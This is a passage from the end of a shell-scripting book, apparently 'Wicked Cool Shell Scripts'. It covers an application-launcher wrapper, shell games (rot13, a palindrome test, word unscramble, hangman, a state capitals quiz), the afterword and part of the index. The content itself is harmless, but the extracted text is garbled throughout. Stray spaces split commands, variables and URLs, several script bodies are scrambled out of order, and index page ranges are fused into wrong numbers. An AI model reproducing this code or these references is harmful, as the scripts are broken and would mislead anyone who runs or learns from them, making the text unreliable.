This script revolves around the open program having a zero return code upon success and a nonzero return code
upon failure.
i f ! $ o pen " $@" > /dev /nul l 2>& 1 ; t h en
i f ! $op en -a " $@" >/de v/nul l 2> & 1 ; t h en
If the supplied argument is not a filename, the first conditional fails, and the script tests to see if the supplied argument
is a valid application name by adding -a. If the second conditional fails, the script uses a ca se statement to test for

common nicknames that people use to refer to popular applications:


c as e $ ( ech o $1 | tr ' [:up per:] ' '[ : l owe r : ]' ) in
And it even offers a friendly message when it matches a nickname, just before launching the named application:
$ o pen 2 ex ce l
Y ou as k ed fo r e xc el b ut I thin k yo u mea n Mi cr os o ft E x ce l .

Running the Script


The ope n 2 script expects one or more filenames or application names to be specified on the command line.

The Result
Without this wrapper, an attempt to open the application Microsoft Word fails:
$ o pen "Mi cr oso ft Wor d"
2 00 3-0 9 -20 2 1:5 8: 37.7 69 o pen[2 5 733 ] No s u ch f il e :
/ U ser s/ tay lo r/De skto p//Mi c ros o f t W o r d
Rather a scary error message, actually, though it occurred only because the user did not supply the -a flag. The same
invocation with the o pen 2 script shows that it is no longer necessary to remember the -a flag:
$ o pen 2 "M ic ros of t Wo rd"
$
No output is good: The application launched and was ready to use. To make this script maximally useful, I've included
a series of nicknames for common Panther (Mac OS X 10.3) applications, so while op en -a w o rd definitely won't
work, o pen2 wo rd works just fine.

Hacking the Script


This script could be considerably more useful if the nickname list was tailored to your specific needs or the needs of
your user community. That should be easily accomplished!

Chapter 12: Shell Script Fun and Games


Overview
Up to this point, we've been pretty focused on serious and important uses of shell scripts to improve your interaction
with your Unix/Linux system and make the system more flexible and powerful. But there's another side to shell scripts
that's worth exploring just briefly as the book wraps up, and that's games.
Don't worry I'm not proposing that we write a new version of The Sims as a shell script. It just turns out that there
are a number of simple games that are easily and informatively written as shell scripts, and, heck, wouldn't you rather
learn how to debug shell scripts by working with something fun than with some serious utility for suspending user
accounts or analyzing Apache error logs?
Here are two quick examples up front to show you what I mean. First off, long-time Usenet readers know about
something called rot13, a simple mechanism whereby off-color jokes and obscene text are obscured to make them a
bit less easily read. It's what's called a substitution cipher, and it turns out to be remarkably simple to accomplish in
Unix.
To rot13 something, simply feed it through t r:
t r '[a - zA- Z] ' ' [n -za- mN-Z A-M]'
Here's an example:
$ e cho "So t wo pe ople wal k int o a b a r.. . " | t r ' [a -z A -Z ] ' '[ n -z a- m N- ZA - M] '
F b gjb crb cy r j ny x va gb n one. . .
To unwrap it, simply apply the same transform:
$ e cho 'Fb g jb cr bcyr jny x vag b n o n e.. . ' | t r ' [a -z A -Z ] ' '[ n -z a- m N- ZA - M] '
S o two peo pl e w al k in to a bar. . .
Another short example is a palindrome checker. Type in something you believe is a palindrome, and it'll test it to see:
t es tit = "$( ec ho $@ | s ed ' s/[^[ : alp h a :]] / / g' | t r ' [: u pp e r: ]' '[ :l o we r: ] ') "
b ac kwa r ds= "$ (ec ho $te stit | re v )"
i f [ " $ tes ti t" = "$ba ckwa rds" ] ; t h en
e cho "$@ i s a p alin drom e"
e ls e
e cho "$@ i s n ot a p alin drome "
fi
The logic here: A palindrome is a word that's identical forward or backward, so the first step is to remove all
nonalphabetic characters and then ensure that everything is lowercase. Then the Unix utility r e v reverses the letters in
a line of input. If the forward and backward versions are the same, we've got a palindrome, and if they differ, we don't.
The three short games presented in this final chapter are only a bit more complex, but all will prove fun and worth
adding to your system, I'm sure. All three require separate data files, however, which you can most easily obtain from
my website. For the word list, load and save the file at
h tt p:/ / www .i ntu it ive. com/ wicke d /ex a m ple s / lo ng -w o rd s. t xt , and for the state capitals data file
download ht tp :// ww w.i nt uiti ve.c om /w i c ked / e xam p le s /s ta t e. c ap it a ls .t x t
Save both of the files in the directory /us r/li b / gam e s / for the scripts to work as written, or, if you save them
elsewhere, modify the scripts to match.

#99 Unscramble: A Word Game


If you've seen the Jumble game in your newspaper or played word games at all, you're familiar with the basic concept
of this game: A word is picked at random and then scrambled. Your task is to figure out and guess what the original
word is in the minimum number of turns.

The Code
# !/ bin / sh
# u nsc r amb le - Pi cks a wo rd, s c ram b l es i t , an d a sk s t he us er to g u es s
#
w h at th e o ri gina l wo rd (o r ph r a se) w as .
w or dli b ="/ us r/l ib /gam es/l ong-w o rds . t xt"
r an dom q uot e= "$H OM E/bi n/ra ndomq u ote "
# Sc ri pt #7 6
s cr amb l ewo rd ()
{
# Pi c k a w ord r ando mly from t he w o rdl i b , an d s cr am b le it .
# Or i gin al wo rd is $mat ch an d sc r a mbl e d w or d i s $s c ra m bl ed
m atc h ="$ ($ ran do mquo te $ wordl i b)"
e cho "Pi ck ed ou t a word !"
l en= $ (ec ho $m at ch | wc -c | s ed ' s /[^ [ : di gi t: ] ]/ /g ' )
s cra m ble d= ""; l astv al=1

f or ( (va l= 1; $v al < $le n ;))


do
if [ $ (p erl - e "p rint int r and ( 2 )") - eq 1 ] ; th e n
s cra mb led =$ scra mble d$(ec h o $ m a tch | c ut - c $v al )
el s e
s cra mb led =$ (ech o $m atch | cu t -c$ v a l) $s cr a mb le d
fi
va l =$( ($ val + 1))
d one

if [ !
e cho
e cho
e cho
e xit
fi

-r $w ord li b ] ; th en
"$0 : Mis si ng w ord libra r y $ w o rdl i b " >& 2
"(o nl ine : http ://w ww.in t uit i v e.c o m /w ic ke d /e xa m pl e s/ lo n g- wo r ds .t x t" > & 2
"sa ve th e file as $word l ib a n d y o u 'r e re a dy t o p l ay !) " > &2
1

n ew gam e ="" ; gue ss es=0 ; co rrect = 0; t o tal = 0


u nt il [ "$ gu ess " = "q uit" ] ; d o
s cra m ble wo rd
e cho ""
e cho "Yo u nee d to u nscr amble : $s c r amb l e d"
g ues s ="? ?" ; gu esse s=0
t ota l =$( ($ tot al + 1 ))
w hil e [ "$ gue ss " != "$m atch" -a " $ gue s s " != " q ui t" -a "$ gu e ss " ! = "n e xt " ]
do
ec h o " "
ec h o - n "Yo ur gue ss ( quit| n ext ) : "
re a d g ue ss
if [ " $g ues s" = " $mat ch" ] ; t h e n
g ues se s=$ (( $gue sses + 1) )

e cho " "


e cho " *** Y ou g ot i t wit h tr i e s = $ {g ue ss e s} ! W el l d on e !! * * *"
e cho " "
c orr ec t=$ (( $cor rect + 1) )
el i f [ " $gu es s" = "ne xt" - o "$ g u ess " = "q ui t " ] ; t h en
e cho " The u nscr ambl ed wo r d w a s \" $ m at ch \" . Y ou r t r ie s: $g ue s se s"
el s e
e cho " Nop e. Tha t's not t h e u n s cra m b le d wo r d. T r y a ga in . "
g ues se s=$ (( $gue sses + 1) )
fi
d one
d on e
e ch o " D one . You c orre ctly figu r ed o u t $ c o rr ec t o ut o f $ t ot al sc ra m bl ed wo rd s ."
e xi t 0

How It Works
To randomly pick a single line from a file, this script uses Script #76, Displaying Random Text, even though it was
originally written to work with web pages. Like many good Unix utilities, it turns out to be a useful building block in
other contexts than the one it was intended for:
m at ch= " $($ ra ndo mq uote $wo rdlib ) "
The toughest part of this script was figuring out how to scramble a word. There's no handy Unix utility for that, but
fortunately it turns out that if we assemble the scrambled word by going letter by letter through the correctly spelled
word and randomly adding each subsequent letter to the scrambled sequence at either the beginning or the end of the
sequence, we quite effectively scramble the word differently and unpredictably each time:
i f [ $ ( per l -e "p rint int rand ( 2)" ) -eq 1 ] ; t h en
s cra m ble d= $sc ra mble d$(e cho $ m atc h | c u t - c$ va l )
e ls e
s cra m ble d= $(e ch o $m atch | cu t -c $ v al) $ s cr am bl e d
fi
Notice where $ sc ram bl ed is located in the two lines: In the first line the added letter is appended, while in the
second it is prepended.
Otherwise the main game logic should be easily understood: The outer w hi le loop runs until the user enters q ui t
as a guess, while the inner loop runs until the user either guesses the word or types n e xt to skip to the next word.

Running the Script


This script has no arguments or parameters, so just type in the name, and you're ready to play!

The Results
$ u nsc r amb le
P ic ked out a wo rd !
Y ou ne e d t o uns cr ambl e: n inren o ccg
Y ou r g u ess ( qui t| next ) : conce r nin g
* ** Yo u go t it wi th t ries = 1! Wel l don e ! ! ** *
P ic ked out a wo rd !
Y ou ne e d t o uns cr ambl e: e sivrm i pod
Y ou r g u ess ( qui t| next ) : quit
T he un s cra mb led w ord was "impr o vis e d ". Y o ur t ri e s: 0
D on e. Y ou co rre ct ly f igur ed ou t 1 o u t o f 2 sc ra m bl ed wo r ds .
Clearly an inspired guess on that first one!

Hacking the Script


Perhaps some method of offering a clue would make this game more interesting or, alternatively, a flag that requests

the minimum word length that is acceptable. To accomplish the former, perhaps the first n letters of the unscrambled
word could be shown for a certain penalty in the scoring; each clue requested would show one additional letter. For the
latter, you'd need to have an expanded word dictionary, as the one included with the script has a minimum word length
of ten letters, which makes it rather tricky!

#100 Guess the Word Before It's Too Late: Hangman


A classic word game with a macabre metaphor, hangman is nonetheless popular and enjoyable. In the game, you
guess letters that might be in the hidden word, and each time you guess incorrectly, the man hanging on the gallows
has an additional body part drawn in. Make too many wrong guesses, and the man is fully illustrated, so not only do
you lose, but, well, you presumably die too. Not very pleasant!
However, the game itself is fun, and writing it as a shell script proves surprisingly easy.

The Code
#! / b in/ s h
# h a ngm a n - A r ud i m e nt a r y v e r s io n o f the hang ma n gam e. In st ead o f s ho win g a
#
gra d ua ll y e mb o d i ed h a ng i n g m an, this simp ly h as a bad g ues s cou nt dow n.
#
You ca n o pt io n a l ly i n di c a t e the init i al d is ta nce f rom t he ga llo ws as t he o n ly
#
arg .
wo r d lib = "/ us r /l ib / g a me s / l on g - w or ds. t xt"
ra n d omq u ot e= " $H OM E / b in / r a nd o m q uo te. s h"
# Sc ri pt #7 6
em p t y=" \ ."
# w e n e e d s o m e th ing for t he s ed [ set ] whe n $gu es sed =" "
ga m e s=0
if [ !
e c ho
e c ho
e c ho
e x it
fi

- r $w o rd li b ] ; t h en
" $0 : M is si n g wo r d li b r a ry $w o rdli b " >& 2
" (o nl i ne : h t t p: / / w ww . i n tu iti v e.co m /wic ke d/ exa mp les /l ong -w ord s. txt " >& 2
" sa ve th e f i l e a s $w o r d li b a n d yo u 're re ad y t o pla y! )" >& 2
1

wh i l e [ "$ gu e ss " ! = "q u i t " ] ; d o


m a tch = "$ ($ r an do m q u ot e $ wo r d l ib )"

# pic k a new w ord f rom t he li bra ry

i f [ $ ga me s - gt 0 ] ; t he n
ech o " "
ech o " ** * N ew G a me ! * ** "
fi
g a mes = "$ (( $ ga me s + 1 ) ) "
g u ess e d= "" ; gu e s s =" " ; b a d = ${ 1:- 6 }
p a rti a l= "$ ( ec ho $ m at c h | s e d " s/[ ^ $emp t y${g ue ss ed} ]/ -/g ") "
w h ile [ "$ g ue ss " ! = " $ m at c h " - a " $ gues s " != " qu it" ] ; do
ech o " "
if [ ! - z " $g u e s se d " ] ; t he n
e c ho - n " gu e s s ed : $ gu e s s ed , "
fi
ech o " st e ps f r o m g a l l ow s : $b ad, word so f ar : $pa rt ial "
ech o - n " Gu es s a l e t t er : "
rea d g ue s s
ech o " "
if [ " $g u es s" = "$ m a t ch " ] ; th e n
e c ho " Y ou g o t it ! "
eli f [ " $ gu es s " = " q u it " ] ; th e n
s l ee p 0
# a ' n o op' to a v oid an e rro r mes sa ge on 'q ui t'
eli f [ $ ( ec ho $ g ue s s | w c -c | s ed ' s /[^[ :d ig it: ]] //g ') -n e 2 ] ; th en
e c ho " U h oh : Y ou c a n o n l y gue s s a s ingl e le tte r at a tim e"
eli f [ ! -z " $ ( e ch o $ gu e s s | se d 's/ [ [:lo we r: ]]/ /g ')" ] ; th en
e c ho " U h oh : P le a s e o n l y u se l ower c ase le tt ers f or yo ur gu ess es "
eli f [ - z " $( e c h o $ g u es s | s ed " s/[$ e mpty $g ue sse d] //g ") " ] ; th en
e c ho " U h oh : Y ou h a ve a l re ady trie d $gu es s"
eli f [ " $ (e ch o $ ma t c h | s e d "s/ $ gues s /-/g ") " != "$ mat ch " ] ; th en
g u es se d =" $g u e s se d $ g ue s s "

p a rt ia l =" $( e c h o $ m a tc h | s ed " s/[^ $ empt y$ {g ues se d}] /- /g" )"


i f [ " $ pa rt i a l " = " $m a t c h" ] ; the n
ec ho "* * Y o u 'v e b ee n p ar don e d!! W ell do ne ! T he wo rd wa s \"$ ma tch \" ."
gu es s =" $m a t c h"
e l se
ec ho "* G r e a t! T h e l e t te r \ " $gue s s\" ap pe ars i n t he wo rd !"
fi
eli f [ $ b ad - e q 1 ] ; t h e n
e c ho " * * Uh o h : y o u 'v e r un ou t of s teps . Yo u'r e on th e p la tfo rm ... < SN A P ! >"
e c ho " * * Th e w or d y ou w e re tr y ing t o gu es s was \ "$m at ch\ ""
g u es s= " $m at c h "
els e
e c ho " * N op e , \" $ g u es s \ " d oes not a ppea r in th e wor d. "
g u es se d =" $g u e s se d $ g ue s s "
b a d= $( ( $b ad - 1) )
fi
d o ne
do n e
ex i t 0

How It Works
The tests in this script are all interesting and worth examination. Consider this test to see if the player has entered
more than a single letter as his or her guess:
el i f [ $ (e ch o $ gu e s s | w c - c | s ed ' s/[^ [ :dig it :] ]// g' ) - ne 2 ] ; t he n
Why test for the value 2 rather than 1? Because the entered value has a carriage return appended by the r ead
statement, and so it has two letters if it's correct, not one. The sed in this statement strips out all nondigit values, of
course, to avoid any confusion with the leading tab that wc likes to emit.
Testing for lowercase is straightforward: Remove all lowercase letters from gue ss and see if the result is zero (empty)
or not:
el i f [ ! - z " $( ec h o $g u e s s | s ed 's / [[:l o wer: ]] // g') " ] ; t hen
And, finally, to see if the user has guessed the letter already, transform the guess such that any letters in gue ss that
also appear in the g u es se d variable are removed, and see if the result is zero (empty) or not:
el i f [ - z "$ ( ec ho $ g ue s s | s e d " s/[ $ empt y $gue ss ed ]// g" )" ] ; t he n
Apart from all these tests, however, the trick behind getting ha ng man to work is to translate into dashes all
occurrences in the original word of each guessed letter and then to compare the result to the original word. If they're
different, the guessed letter is in that word:
el i f [ " $( ec h o $m a t c h | s ed " s /$ gue s s/-/ g ")" != " $ma tc h" ] ; t he n
One of the key ideas that made it possible to write hangman was that the partially filled-in word shown to the player,
the variable pa rt i al , is rebuilt each time a correct guess is made. Because the variable gue ss ed accumulates
each letter guessed by the player, a s ed transformation that translates into a dash each letter in the original word that
is not in the gu es s ed string does the trick:
pa r t ial = "$ (e c ho $ m a t ch | se d " s/ [^$ e mpty $ {gue ss ed }]/ -/ g") "

Running the Script


The hangman game has one optional argument: If you specify a numeric value as a parameter, it will use that as the
number of incorrect guesses allowed, rather than the default of 6.

The Results
$ h a ngm a n
st e p s f r om g a ll ow s : 6, w o rd s o f ar: ---- - ---- -- -Gu e s s a le tt e r: e
* G r eat ! T he le tt e r "e " a pp e a r s in t he w o rd!
gu e s sed : e , s te ps f r om g a ll o w s : 6, w ord s o fa r: - e-- e- --- -- -Gu e s s a le tt e r: i
* G r eat ! T he le tt e r "i " a pp e a r s in t he w o rd!

gu e s sed : e i, st ep s f ro m g al l o w s: 6, word so f ar : -e- -e --i -- --Gu e s s a le tt e r: o


* G r eat ! T he le tt e r "o " a pp e a r s in t he w o rd!
gu e s sed : e io , s te p s fr o m ga l l o ws : 6 , wor d so fa r: -e -- e-- io --- Gu e s s a le tt e r: u
* G r eat ! T he le tt e r "u " a pp e a r s in t he w o rd!
gu e s sed : e io u , st e p s f r o m g a l l ow s: 6 , wo r d so f ar : - e- -e- -i ou- -Gu e s s a le tt e r: m
* N o pe, "m " d oe s n o t a p p e ar i n t he w ord.
gu e s sed : e io u m, s t e p s f r o m g a l lo ws: 5, w o rd s o fa r: -e --e -- iou -- Gu e s s a le tt e r: n
* G r eat ! T he le tt e r "n " a pp e a r s in t he w o rd!
gu e s sed : e io u mn , s t e ps f r om g a ll ows : 5, w ord so f ar: - en- en -io u- -Gu e s s a le tt e r: r
* N o pe, "r " d oe s n o t a p p e ar i n t he w ord.
gu e s sed : e io u mn r, s t ep s f ro m g al low s : 4, word s o far : -en -e n-i ou --Gu e s s a le tt e r: s
* G r eat ! T he le tt e r "s " a pp e a r s in t he w o rd!
gu e s sed : e io u mn rs , s te p s fr o m ga llo w s: 4 , wor d so fa r: se n- en- io us- Gu e s s a le tt e r: t
* G r eat ! T he le tt e r "t " a pp e a r s in t he w o rd!
gu e s sed : e io u mn rs t , st e p s f r o m g all o ws: 4 , wo rd s o f ar : s en ten ti ous -Gu e s s a le tt e r: l
* G r eat ! T he le tt e r "l " a pp e a r s in t he w o rd!
gu e s sed : e io u mn rs t l , s t e p s f r o m gal l ows: 4, w or d so fa r: se nte nt iou sl Gu e s s a le tt e r: y
** Y ou' v e be e n pa r d o ne d ! ! W e l l d one !

Th e wor d wa s " se nte nt iou sl y".

** * New Ga me ! * **
st e p s f r om g a ll ow s : 6, w o rd s o f ar: ---- - ---- Gu e s s a le tt e r: q u i t

Hacking the Script


Obviously it's quite difficult to have the fancy guy-hanging-on-the-gallows graphic if we're working with a shell script, so
we use the alternative of counting "steps to the gallows" instead. If you were motivated, however, you could probably
have a series of predefined "text" graphics, one for each step, and output them as the game proceeds. Or you could
choose a nonviolent alternative of some sort, of course!
Note that it is possible to pick the same word twice, but with the default word list containing 2,882 different words,
there's not much chance of that occurring. If this is a concern, however, the line where the word is chosen could also
save all previous words in a variable and screen against them to ensure that there aren't any repeats.
Finally, if you were motivated, it'd be nice to have the guessed letters list be sorted alphabetically. There are a couple
of approaches to this, but I think I'd try to use se d |sor t .

#101 A State Capitals Quiz


Once you have a tool for choosing a line randomly from a file, as we have with Script #76, Displaying Random Text,
there's no limit to the type of quiz games you can write. In this instance, I've pulled together a list of the capitals of all
50 states in the United States of America; this script randomly chooses one, shows the state, and asks the user to type
in the matching capital.

The Code
# ! / b in /s h
# s t at es - A sta t e ca p ital gu e s s i n g g a m e . R e q u i r e s t h e s t a t e c a p i t a l s
#
da ta fi l e at http : //ww w.i n t u i t i v e . c o m / w i c k e d / e x a m p l e s / s t a t e . c a p i t a l s . t x t .
d b = " /u sr /li b /gam e s/st a te.c api t a l s . t x t "
r a n d om qu ote = "$HO M E/bi n /ran dom q u o t e . s h "
if [ !
e c ho
e c ho
e c ho
e x it
fi

# Script #76

- r $ d b ] ; the n
" $0: Can' t ope n $db fo r r e a d i n g . " > & 2
" (ge t htt p ://w w w.in tui t i v e . c o m / w i c k e d / e x a m p l e s / s t a t e . c a p i t a l s . t x t " > & 2
" sav e the file as $ db a n d y o u ' r e r e a d y t o p l a y ! ) " > & 2
1

g u e s se s= 0; c orre c t=0; tota l=0


w h i l e [ "$g u ess" != " q uit" ] ; d o
t h is ke y=" $ ($ra n domq u ote$ db) "
s t at e= "$( e cho $ this k ey | cu t - d \
-f1 | sed 's/-/ /g')"
c it y= "$( e cho $ this k ey | cu t - d \
-f2 | sed 's/-/ /g')"
m a tc h= "$( e cho $ city | tr '[ : u p p e r : ] ' ' [ : l o w e r : ] ' ) "
g u es s= "?? " ; t o tal= $ (( $ tot a l + 1 ) ) ;
e c ho " "
e c ho " Wha t cit y is t he c api t a l o f $ s t a t e ? "
w h il e [ " $ gues s " != "$ma tch " - a " $ g u e s s " ! = " n e x t " - a " $ g u e s s " ! = " q u i t " ]
do
ec ho -n "Ans w er: "
re ad gu e ss
if [ "$ g uess " = " $ matc h" - o " $ g u e s s " = " $ c i t y " ] ; t h e n
ec ho " "
ec ho " *** A bsol u tely co r r e c t ! W e l l d o n e ! * * * "
co rre c t=$( ( $co r rect + 1 ) )
gu ess = $mat c h
el if [ " $gue s s" = "nex t" - o " $ g u e s s " = " q u i t " ] ; t h e n
ec ho " "
ec ho " $cit y is t he c api t a l o f $ s t a t e . "
el se
ec ho " I'm a frai d tha t's n o t c o r r e c t . "
fi
d o ne
done
e c h o " Yo u g o t $c o rrec t out of $ t o t a l p r e s e n t e d . "
exit 0

How It Works
For such an entertaining game, sta tes is very simple scripting. The data file contains state/capital pairs, with all
spaces in the state and capital names replaced with dashes and the two fields separated by a single space. As a
result, extracting the city and state names from the data is easy:
s t a t e= "$ (ec h o $t h iske y | c ut - d \
-f1 | sed 's/-/ /g')"
c i t y= "$ (ec h o $t h iske y | c ut - d \
-f2 | sed 's/-/ /g')"
Each guess is compared against both the all-lowercase version of the city name (m a t c h ) and the actual correctly

capitalized city name to see if it's correct. If not, the guess is compared against the two command words n e x t and
q u i t . If either matches, the script shows the answer and either prompts for another state or quits, as appropriate.

Running the Script


This script has no arguments or command flags.

The Results
Ready to quiz yourself on state capitals?
$ s t at es
W h a t c it y i s the capi t al o f I n d i a n a ?
A n s w er : Blo o ming t on
I ' m af ra id t hat' s not corr ect .
A n s w er : Ind i anap o lis
* * * Ab so lut e ly c o rrec t ! We ll d o n e ! * * *
W h a t c it y i s the capi t al o f M a s s a c h u s e t t s ?
A n s w er : Bos t on
* * * Ab so lut e ly c o rrec t ! We ll d o n e ! * * *
W h a t c it y i s the capi t al o f W e s t V i r g i n i a ?
A n s w er : Cha r lest o n
* * * Ab so lut e ly c o rrec t ! We ll d o n e ! * * *
W h a t c it y i s the capi t al o f A l a s k a ?
A n s w er : Fai r bank s
I ' m af ra id t hat' s not corr ect .
A n s w er : Anc h orag e
I ' m af ra id t hat' s not corr ect .
A n s w er : Nom e
I ' m af ra id t hat' s not corr ect .
A n s w er : Jun e au
* * * Ab so lut e ly c o rrec t ! We ll d o n e ! * * *
W h a t c it y i s the capi t al o f O r e g o n ?
A n s w er : qui t
S a l e m is th e cap i tal o f Or ego n .
Y o u go t 4 o u t of 5 pr e sent ed.
Fortunately, the game tracks only ultimately correct guesses, not how many incorrect guesses you made or whether
you popped over to Google to get the correct answer! :-)

Hacking the Script


Probably the greatest weakness in this game is that it's so picky about spelling. A useful modification would be to add
some code to allow fuzzy matching, so that the user entry of J u n e u might match Juneau, for example. This could be
done using a modified Soundex algorithm, in which all vowels are removed and all doubled letters are squished down
to a single letter (e.g., Annapolis would transform to npls). This might be too forgiving for your tastes, but the general
concept is worth considering.
As with other games, a "hint" function would be useful too. Perhaps it would show the first letter of the correct answer
when requested but keep track of how many hints were used as the play proceeded.
Although this game is written around state capitals, it would be quite trivial to modify the script to work with any sort of
paired data file. For example, you could create an Italian vocabulary quiz with a slightly different file, or a country/
currency match, or even a politician/political party quiz. Again, as we've seen repeatedly in Unix, writing something that
is reasonably general purpose allows it to be reused in useful and occasionally unexpected ways.

Afterword
This marks the end of Wicked Cool Shell Scripts. Thank you for being part of this journey into the wild interior of shell
scripting. I've really had a fun time writing and developing all of the scripts in this book, and it's significantly improved
my Unix and Mac OS X working environment! I can only hope that this book has expanded your horizons similarly, both
showing you the tremendous power and capability of the Unix shell, and offering you many ideas about basic
algorithms and savvy ways to approach seemingly tough programming problems.
Please let me know how you liked the book, which scripts are your favorites, and which, if any, hiccupped on your
particular version of Unix, Linux, or Mac OS X. You should also check in occasionally on the book's website for errata
and new scripts, and you can even browse a library of scripts that were axed for the book but might still be interesting
reading. Go to htt p: //w ww .int uiti ve .c o m /wi c k ed/ and you'll find everything you need to continue your
journey toward becoming a Shell Script Maven.
Best regards,
Dave Taylor
<taylor@intuitive.com>

Index
Note: Italicized page numbers refer to tables and illustrations.

Symbols
$() notation, 49, 57, 151
$#varname notation, 97
$$ notation, 39
$(()) sequence, 29, 30
${#var} notation, 98
${var%${var#?}} method, 1213
${var%pattern} call, 13
${varname:?"errorMessage"} notation, 134
${varname:start:size} function, 13
${varvalue%${varvalue#?}} notation, 134
% mod function, 39
\\n notation, 174
^V sequence, 35
~account service, 126
<< notation, 30
>/dev/null notation, 52, 308
\033 sequence, 35
2>&1 notation, 233, 308

Index
A
access_log file, 25660
accounts
admin, 243
badguy, 302
password-protected, 17172
user accounts
deleting, 12931
listing all, 24142
suspending, 12729
virtual host, 29095
AccuWeather site, 181
Adams, Cecil, 210
addagenda script, 86, 8688 , 90
adding users, 12427 , 3027
addmacalias script, 3079
addmacuser script, 3027
adduser script, 12427
addvirtual script, 29095
admin account, 243
administration, Internet. See web and Internet administration
administration, system. See managing users; system maintenance
agenda script, 86, 8991
alphanumeric input, validating, 1315
American National Standards Institute sequences. See ANSI color sequences
ANSI color sequences, 3335
Apache access_log file, 25660
Apache error_log file, 26468
Apache passwords, 23744
apm script, 23744
code, 23740
hacking, 24344
how works, 24143
results of, 243
running, 243
apm-footer.html file, 238, 242
apropos command, 63
arbitrary-precision floating-point calculator, 2931
archivedir script, 16163
archives
remote, 26871
removed, 4953
archiving files, as removed, 4749
args variable, 262
aspell spelling utility, 235
awk command, 52, 57, 94, 146, 285
awk script, 119, 168, 184

Index
B
backing up directories, 16163
backup script, 15860
backups, managing, 15860
badguy account, 302
basename, 48
bash shell, 3, 310
BBC news, tracking with lynx, 17275
bbcnews script, 17275
bc program, 29, 30, 86
bestcompress script, 1079
/bin/sh login shell, 304
books, checking overdue at library, 18286
Bourne Shell scripts, 3
broken external links, 23235

Index
C
\c escape sequence, 10
calc script, 7375
calculating
currency values, 18892
loan payments, 8486
calculators
floating-point arbitrary-precision, 2931
interactive, 7375
case statement, 241, 313
cat command, 46, 212, 270
Census Bureau, 180
CGI environment, 2045
CGI scripts, 201, 203
cgi-bin directory, 203, 243
cgrep script, 1024
changetrack script, 196, 196200
chattr command, 55
checkexternal script, 23235
checkfor function, 267
checkForCmdInPath method, 13
checking spelling, 7576
checklibrary script, 18286
checklinks script, 178, 23032
checkspelling script, 7576
chown command, 293
Christiansen, Tom, 3
code element, 183
color sequences, ANSI. See ANSI color sequences
commands, user. See user commands
compress program, 104, 106
compressed files
code, 1047
ensuring maximally compressed files, 1079
connecttime script, 16668
contact forms, processing, 21114
contactus.html. web page, 213
content mirroring, 244
convertatemp script, 8284
counter script, 22125
cron jobs, 15254
code, 15253
crontab entries, validating, 14752
code, 14850
hacking script, 152
results of script, 151
running script, 151
crontab file, 147, 151, 285

.cshrc file, 123


curl utility, 171
currency values, calculating, 18892
cut command, 20, 86, 262, 311

Index
D
date command, 66, 69, 90, 139, 220
date formats, normalizing, 1518
date format string, 141
date, system, 13941
debugging shell scripts, 3841
define script, 17880
defining words, 17880
.deleted-files directory, 47, 49
deleteuser script, 124, 12931
deleting user accounts, 12931
/dev/null directory, 23334
/dev/null shells, 302
df command, 117
df output, improving readability of, 11820
dictionary, adding, 8082
diff command, 311
DIR script, 6163
directories
See also names of specific directories
backing up, 16163
code, 5657 , 16162
displaying contents of, 5658
synchronizing with ftp, 24447
Directory block, 293
disk quota exceeded error message, 116
diskhogs script, 11517
disks
analyzing usage, 11314
available space, 11718
reporting hogs, 11517
diskspace script, 11718
ditto command, 305
docron, 154
docron script, 15254
downloading files, 16972
du command, 113

Index
E
echo function, 10, 2729
echon script, 2829 , 3637
email
adding alias, 3079
turning web pages into, 21011
enabled script, 14144
enabled services, 14144
env command, 204
environment variables, 10
error_log file, 26468
escape sequences, 219
/etc/crontab file, 153
/etc/passwd file, 113, 125, 126
/etc/skel directory, 126
eval function, 106, 140
events, keeping track of, 8691
code, 8689
hacking script, 91
results of script, 9091
exceeds disk quota message, 114
exchangerate script, 19192
Extensible Markup Language (XML), 166
external links, broken, 23235
extracting URLs from web pages, 17578

Index
F
File Transfer Protocol (FTP). See FTP (File Transfer Protocol)
filelock script, 3133
filenames, 5861
files
archiving as removed, 4749
compressed, 1047
displaying with additional information, 9596
displaying with line numbers, 9495
downloading via FTP, 16972
locating by filename, 5861
locked, 3133
logging removals, 5455
removed archives, 4953
rotating log, 15458
synchronizing with sftp program, 24953
find function, 53, 114, 123, 157
findman script, 6366
findsuid script, 13839
fixguest script, 13536
floating-point calculator, 2931
floating-point input, 2224
fmt command, 45, 96, 97, 116
footer.html file, 215, 221
formatdir script, 5658
forms, contact, 21114
fquota script, 11314 , 11516
Free Software Foundation, 3
FTP (File Transfer Protocol)
downloading files via, 16972
making sftp look like, 100101
synchronizing directories with, 24447
tracking usage, 27680
ftpget script, 16972
ftpsyncdown script, 192, 24749
ftpsyncup script, 24448

Index
G
games, 31527
hangman, 32024
state capitals quiz, 32427
unscramble word, 31619
getdope script, 21011
getexchrate script, 18892 , 194
getlinks script, 17578
getstats script, 28081 , 28485
getstock script, 19395
gmk function, 57
GNU-style flags, 98100
grep program, 65, 1024 , 118, 234, 267
guest books, 21721
guestbook script, 21721
guestbook.txt file, 21920
guests, cleaning up after, 13536

Index
H
hacks, webmaster. See webmaster hacks
hangman game, 32024
header.html file, 215, 221
here document capability, 30
hilow script, 3841
hint function, 327
Holbrook, Bill, 2089
/home directory, 113
.htaccess file, 23738 , 241, 243
.htpasswd file, 241, 243
htpasswd program, 237, 241, 243
httpd.conf file, 66, 29394

Index
I
id applications, 13839
IEEE (Institute for Electrical and Electronic Engineers), 10
if statements, 22
IFS (internal field separator), 134, 242
ImageMagick tool, 216
IMDb (Internet Movie Database), 18688
in_path() function, 134
inetd service, 14142
inpath script, 1013
input
alphanumeric, 1315
floating-point, 2224
integer, 2022
Institute for Electrical and Electronic Engineers (IEEE), 10
integer input, 2022
code, 2021
hacking script, 22
results of script, 22
running script, 21
interactive calculator, 7375
code, 74
results of script, 75
running script, 75
internal field separator (IFS), 134, 242
internal links, 23032
Internet Movie Database (IMDb), 18688
Internet server administration, 25595
See also web and Internet administration; web and Internet users
adding new virtual host accounts, 29095
avoiding disaster with remote archive, 26871
exploring Apache access_log, 25660
exploring Apache error_log, 26468
mirroring websites, 27275
monitoring network status, 28086
code, 28183
how works, 28485
results of script, 286
running script, 28586
renicing tasks by process name, 28690
tracking FTP usage, 27580
understanding search engine traffic, 26064
ispell command, 76, 77, 81
itunelist script, 31012
iTunes libraries, 31012

Index
K
Kevin & Kell comic strip, 208209
kill processes, 14447
killall command, 144
killall script, 14447

Index
L
large numbers, presenting, 1820
lastcmd variable, 176
latitude/longitude information, 180
left-rooting, 146
libraries
checking overdue books at, 18286
iTunes, 31012
shell script, 3638
.library.account.info database library, 184
library.sh script, 36
library-test script, 3638
line numbers, 9495
lines
formatting long lines, 4547
wrapping long, 9798
links
external, 23235
